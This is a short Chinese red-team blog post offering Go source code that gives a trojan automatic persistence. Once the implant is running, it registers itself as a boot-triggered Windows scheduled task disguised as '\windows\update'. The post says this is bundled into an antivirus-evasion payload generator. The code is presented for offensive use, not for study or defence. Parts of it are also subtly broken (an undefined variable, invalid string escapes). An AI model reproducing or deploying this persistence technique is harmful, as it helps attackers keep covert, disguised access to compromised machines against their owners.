红队技术-上线木马自动维权

2023-11-16 09:33:29 浏览数 (2)

在攻防中,上线机器总是需要手动进行维权,太过于麻烦,何不直接上线即维权呢,直接放核心代码,当做个记录

https://github.com/capnspacehook/taskmaster

代码语言:javascript复制
package main

import (
	"os"

	"github.com/capnspacehook/taskmaster"
)

func runWinTask(path string) {
	// 创建初始化计划任务
	taskService, _ := taskmaster.Connect()

	defer taskService.Disconnect()
	// 定义新的计划任务
	newTaskDef := taskService.NewTaskDefinition()
	// 添加执行程序的路径
	newTaskDef.AddAction(taskmaster.ExecAction{
		Path: path,
	})
	// 定义计划任务程序的执行时间等,设置为开机启动
	newTaskDef.AddTrigger(taskmaster.BootTrigger{
		TaskTrigger: taskmaster.TaskTrigger{
			Enabled: enable,
		},
	})

	// 创建计划任务
	result, _, _ := taskService.CreateTask("\windows\update", newTaskDef, true)
	result=result
}

func main() {
	path, err := os.Executable()
	if err != nil {
		return
	}

	runWinTask(path)
}

管理员权限下自动维权,分为自身维权和迁移路径维权版本,已集合至千机免杀一键生成

0 人点赞